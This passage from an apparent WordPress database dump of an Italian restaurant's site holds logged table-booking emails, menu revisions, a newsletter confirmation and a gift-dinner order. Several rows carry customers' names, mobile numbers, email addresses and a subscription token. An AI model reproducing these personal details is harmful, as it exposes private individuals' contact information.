15:32:04','2020-07-04 13:32:04','Da: Giulia \nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','Invalid \"Reply-To\" e-mail address \"giulia.bacch@gmail.con\"','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-4','','','2020-07-04 15:32:04','2020-07-04 13:32:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-4/',0,'postman_sent_mail','',0),(1038,0,'2020-07-04 15:32:43','2020-07-04 13:32:43','Da: Giulia \nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','Invalid \"Reply-To\" e-mail address \"giulia.bacch@gmail.con\"','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-5','','','2020-07-04 15:32:43','2020-07-04 13:32:43','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-5/',0,'postman_sent_mail','',0),(1039,0,'2020-07-04 15:32:55','2020-07-04 13:32:55','Da: Giulia \nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','Invalid \"Reply-To\" e-mail address \"giulia.bacch@gmail.con\"','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-6','','','2020-07-04 15:32:55','2020-07-04 13:32:55','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-6/',0,'postman_sent_mail','',0),(1040,0,'2020-07-04 19:16:45','2020-07-04 17:16:45','Da: Anna \nTelefono: 3408374918\nOggetto: Prenotazione 10 luglio\n\nCorpo del messaggio:\nBuona sera, ho provato a chiamare senza alcun riscontro. Chiedevo se era possibile prenotare una cena per il 10 luglio per un compleanno. Grazie mille per la disponibilità. Anna\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione 10 luglio\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-10-luglio','','','2020-07-04 19:16:45','2020-07-04 17:16:45','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-10-luglio/',0,'postman_sent_mail','',0),(1042,2,'2020-07-21 11:57:58','2020-07-21 09:57:58','<em>La Pasta</em>\r\n\r\n<em>Passatelli asciutti, con Sogliole nostrane, fiori di zucca e tartufo nero </em>\r\n\r\n<em>€15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine del \"Pastificio Mancini\" con crema di peperoni dolci, tonno affumicato e bottarga fatta da noi</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tortelli ripieni di patate e stracciatella di bufala con ragù di astice, pomodorini e basilico</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tagliatelle al ragù… Di Pesce</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> Gnocchi vongole, canocchie e stridoli</em>\r\n\r\n<em>€ 14,00</em>\r\n\r\n&nbsp;\r\n\r\n<em><strong>Per chi non mangia pesce</strong></em>\r\n\r\n<em> </em>\r\n\r\n<em>Gnocchi con pomodoro fresco e basilico</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n<em> Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','La Pasta','','inherit','closed','closed','','51-revision-v1','','','2020-07-21 11:57:58','2020-07-21 09:57:58','',51,'https://www.ristorantesolymar.it/2020/07/21/51-revision-v1/',0,'revision','',0),(1043,2,'2020-07-21 12:17:30','2020-07-21 10:17:30','<strong><em>Antipasti Crudi</em></strong>\r\n\r\n<em> </em><em>Tartara di Tonno rosso con crema di melanzane, pomodori arrostiti,  squacquerone e granella di pistacchi</em>\r\n\r\n<em>€ 15,0o </em>\r\n\r\n<em>Sashimi di Sgombro nostrano marinato, con \"Tzatziki\" di kefir, cetrioli, gel di limone cotto a bassa temperatura e menta</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em><em>Scampi nostrani crudi                                                    € 10,00 all\'etto (min. 2 etti)</em>\r\n\r\n<em>Tavolozza di crudi                                                            € 20,00</em>\r\n\r\n<em>Le ostriche del giorno (min.3)</em>\r\n\r\nDegustazione di ostriche (6 ostriche)                            <em>€ 22,00</em>\r\n\r\n&nbsp;\r\n\r\n<strong><em>Antipasti Freddi</em></strong>\r\n\r\nTagliatelle di Seppia, cotte a bassa temperatura,\"allo scoglio\" con frutti di mare e crostacei\r\n\r\n(servita a temperatura ambiente)\r\n\r\n<em>€ 14,00</em>\r\n\r\n&nbsp;\r\n\r\n<em><strong>Antipasti Caldi</strong></em>\r\n\r\n<em>Piadine fritte ripiene di Sardoncini grigliati, radicchio rosso , cipolla di tropea e squacquerone</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em>Fiori di zucca al forno, ripieni di Gamberi e mozzarella di bufala</em>\r\n\r\n<em>€14,00</em>\r\n\r\n<em>I gamberi alla greca (dal 1994, DIFFIDATE dalle imitazioni!)</em>\r\n\r\n<em>con pomodoro fresco e formaggio fuso</em>\r\n\r\n<em>€ 15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>  </em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante possono essere utilizzati prodotti surgelati all’origine(nella fattispecie di gamberi e calamari) tuttavia è nostro scrupolo selezionare, anche in questo caso, sempre</em> <em>la qualità migliore</em>','Antipasti Cotti','','inherit','closed','closed','','47-revision-v1','','','2020-07-21 12:17:30','2020-07-21 10:17:30','',47,'https://www.ristorantesolymar.it/2020/07/21/47-revision-v1/',0,'revision','',0),(1044,2,'2020-07-21 19:54:54','2020-07-21 17:54:54','<em> Il Pesce</em>\r\n\r\n<em>(Secondi Piatti )</em>\r\n\r\n<em>Mazzancolle nostrane alla griglia con pnzimonio di verdure</em>\r\n\r\n<em>€22,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di Rombo Chiodato ai profumi mediterranei su schiacciata di patate e maionese di polpo (120/140gr)</em>\r\n\r\n<em>€ 2o,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Tataki di Ricciola del Mediterraneo, panzanella di frutta e verdura, maionese di avocado </em>\r\n\r\n<em>€ 20,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La Nostra Catalana tiepida di Astice e Mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Fritto misto con verdurine croccanti   </em><em>€ 23,oo</em>\r\n\r\nLa mezza porzione                                     <em>€ 14,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n<em>Lo Spiedone di pesce grigliato e insalatina mista al balsamico</em>\r\n\r\n(La nostra grigliata per pigri)\r\n\r\n<em>€ 20,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> Per chi non mangia pesce</em>\r\n\r\n<em>Il cannolo croccante di pasta filo e verdure al curry</em>\r\n\r\n<em>€ 11,00</em>\r\n\r\n&nbsp;\r\n\r\n<em>Parmigiana di melanzane(vegano)         </em>\r\n\r\n<em>€ 10,00</em>\r\n\r\n<em> </em>','Il Pesce','','inherit','closed','closed','','108-revision-v1','','','2020-07-21 19:54:54','2020-07-21 17:54:54','',108,'https://www.ristorantesolymar.it/2020/07/21/108-revision-v1/',0,'revision','',0),(1045,2,'2020-07-21 20:04:14','2020-07-21 18:04:14','<strong><em>Le dolcezze</em></strong>\r\n\r\n&nbsp;\r\n\r\n<em>“Il Parfait al croccantino e spuma  zabaione”                                        € 7,00                </em>\r\n\r\n<em> </em>\r\n\r\n<em> </em><em>“Crema Catalana 2.0”                                                                                 € 7,00</em>\r\n\r\n<em>  </em>\r\n\r\n<em>  “Pina Colada”                                                                                               € 7,00                                                                                      </em>\r\n\r\n<em> </em><em>“ Tocca l\'Albicocca ”                                                                                    </em>\r\n\r\n<em>  </em>\r\n\r\n<em> Il tortino al cioccolato con cuore fondente, gelato al caramello salato (tempo di cott. 15min)    € 8,00</em>\r\n\r\n&nbsp;\r\n\r\n<em>La frutta fresca</em>\r\n\r\n<em>Ananas                                                                                                                     € 5,oo</em>','I Dolci','','inherit','closed','closed','','54-revision-v1','','','2020-07-21 20:04:14','2020-07-21 18:04:14','',54,'https://www.ristorantesolymar.it/2020/07/21/54-revision-v1/',0,'revision','',0),(1046,2,'2020-07-21 20:25:41','2020-07-21 18:25:41','<em>La Pasta</em>\r\n\r\n<em>Passatelli asciutti, con Sogliole nostrane, fiori di zucca e tartufo nero </em>\r\n\r\n<em>€15,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Linguine del \"Pastificio Mancini\" con crema di peperoni dolci, tonno affumicato e bottarga fatta da noi</em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tortelli ripieni di patate e stracciatella di bufala con ragù di astice, pomodorini e basilico</em>\r\n\r\n<em>€ 16,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tagliatelle al ragù… Di Pesce</em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> Gnocchi vongole, canocchie e stridoli</em>\r\n\r\n<em>€ 14,00</em>\r\n\r\n&nbsp;\r\n\r\n<em><strong>Per chi non mangia pesce</strong></em>\r\n\r\n<em> </em>\r\n\r\n<em>Gnocchi con pomodoro fresco e basilico</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','La Pasta','','inherit','closed','closed','','51-revision-v1','','','2020-07-21 20:25:41','2020-07-21 18:25:41','',51,'https://www.ristorantesolymar.it/2020/07/21/51-revision-v1/',0,'revision','',0),(1047,0,'2020-07-22 13:05:05','2020-07-22 11:05:05','Da: Silvia Cassanelli \nTelefono: 3472781881\nOggetto: Prenotazione\n\nCorpo del messaggio:\nBuongiorno,\r\nVorrei prenotare per 2 persone la cena di sabato 1 agosto alle 20, possibilmente sulla spiaggia.\r\nGrazie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-4','','','2020-07-22 13:05:05','2020-07-22 11:05:05','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-4/',0,'postman_sent_mail','',0),(1048,0,'2020-07-24 21:55:10','2020-07-24 19:55:10','\n\n    \n        <title>Per favore conferma la tua iscrizione</title>\n        <!--[if !mso]&gt; -->\n        \n            &lt;!--\n            \n                \n                    \n                        #outlook a { padding: 0; }\n                        .ReadMsgBody { width: 100%; }\n                        .ExternalClass { width: 100%; }\n                        .ExternalClass * { line-height:100%; }\n                        body { margin: 0; padding: 0; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }\n                        table, td { border-collapse:collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; }\n                        img { border: 0; height: auto; line-height: 100%; outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; }\n                        p { display: block; margin: 13px 0; }\n                    \n                    <!--[if !mso]&gt;&gt;-->\n                    \n                        @media only screen and (max-width:480px) {\n                            @-ms-viewport { width:320px; }\n                            @viewport { width:320px; }\n                        }\n                    \n                    &lt;!--\n                    <!--[if mso]&gt;-->\n                    \n                      \n                        \n                        96\n                      \n                    \n                    \n                    <!--[if lte mso 11]&gt;-->\n                    \n                      .outlook-group-fix {\n                        width:100% !important;\n                      }\n                    \n                    \n                    \n                        @media only screen and (min-width:480px) {\n                            .mj-column-per-100 { width:100%!important; }\n                        }\n                    \n                    \n                    \n\n                        <div class=\"mj-container\" style=\"background-color:#F4F4F4\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;padding-bottom:0px;padding-top:0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"font-size:0px\"><div style=\"font-size:1px;line-height:40px\"> </div></td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            \n                            <!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px;background:#ffffff\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;background:#ffffff\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\">\n                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\">\n                                                        <tbody>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <h1 style=\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif;font-size: 28px;font-weight: normal;line-height: 32px\"><b><span style=\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione</span></b></h1>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <p style=\"font-size: 15px;margin: 10px 0\">\n                                                                            Per ricevere le newsletter a partire da <a href=\"https://www.ristorantesolymar.it\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.ristorantesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsante:\n                                                                            &lt;!--                                                        To receive newsletters from: \n                                                                                                                                    <a target=\"_blank\" href=\"https://www.ristorantesolymar.it\" style=\"color: #00a6f9;text-decoration: underline;text-decoration: none\" rel=\"noopener noreferrer\">\n                                                                                                                                        <span style=\"color:#00a6f9\">https://www.ristorantesolymar.it</span>\n                                                                                                                                    </a>, please confirm your subscription by clicking the following button. --&gt;\n                                                                        </p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px\" align=\"left\">\n                                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:separate\" align=\"left\" border=\"0\">\n                                                                        <tbody>\n                                                                            <tr>\n                                                                                <td style=\"border:none;border-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px\" align=\"center\" valign=\"middle\" bgcolor=\"#00a6f9\">\n                                                                                    <a href=\"https://www.ristorantesolymar.it?subscription_email=fabio1167%40gmail.com&amp;subscription_locale=it_IT&amp;list_id=22514&amp;thanks_id=0&amp;widget_id=wp_mailjet_subscribe_widget-2&amp;mj_sub_token=412ab79c28dccf7fb2cf40edaa456a39646d4241\" style=\"text-decoration:none;background:#00a6f9;color:#ffffff;font-family:Arial, sans-serif;font-size:16px;font-weight:normal;line-height:120%;text-transform:none;margin:0px\"><b>Sì, voglio iscrivermi a questa lista</b></a>\n                                                                                </td>\n                                                                            </tr>\n                                                                        </tbody>\n                                                                    </table>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <p style=\"font-size: 15px;margin: 10px 0\">Se hai ricevuto questa e-mail per errore o non vuoi più iscriverti, semplicemente ignora questo messaggio.</p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                        </tbody>\n                                                    </table>\n                                                </div><!--[if mso | IE]&gt;-->\n                        </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            \n                            <!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"font-size:0px\"><div style=\"font-size:1px;line-height:40px\"> </div></td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </div>\n                    \n                    ','Conferma d\'iscrizione','','private','closed','closed','','conferma-discrizione-7','','','2020-07-24 21:55:10','2020-07-24 19:55:10','',0,'https://www.ristorantesolymar.it/postman_sent_mail/conferma-discrizione-7/',0,'postman_sent_mail','',0),(1050,0,'2020-07-30 23:32:04','2020-07-30 21:32:04','Da: Mirella Di Simone \nTelefono: 3356693807\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nVorrei prenotare un tavolo per 3 persone x la sera del 10 agosto 2020\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-7','','','2020-07-30 23:32:04','2020-07-30 21:32:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-7/',0,'postman_sent_mail','',0),(1051,1,'2020-08-04 15:02:35','2020-08-04 13:02:35','','Order &ndash; Agosto 4, 2020 @ 03:02 PM','','wc-processing','open','closed','wc_order_exKa8CEf17A73','ordine-aug-04-2020-0102-pm','','','2020-08-04 15:02:58','2020-08-04 13:02:58','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1051',0,'shop_order','',2),(1052,0,'2020-08-04 15:02:58','2020-08-04 13:02:58','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hai ricevuto il seguente ordine da Gaia Marchesini:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1051&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Ordine #1051]</a> (4 Agosto 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prodotto</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantità</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Prezzo</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Regala cena: Menù Creativo per 2 persone + Bevande (#regalacena-creativo-con-bevande)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\">Michela</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Gaia</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">&#x2764;&#xfe0f;</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Metodo di pagamento:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Totale:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<p style=\"margin: 0 0 16px\"><strong>Quanti adulti?:</strong> 1</p>\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Indirizzo di fatturazione</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Gaia Marchesini									<br><a href=\"tel:3398328956\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3398328956</a>													<br>gaia.marchesini@gmail.com							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Congratulazioni per la vendita.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	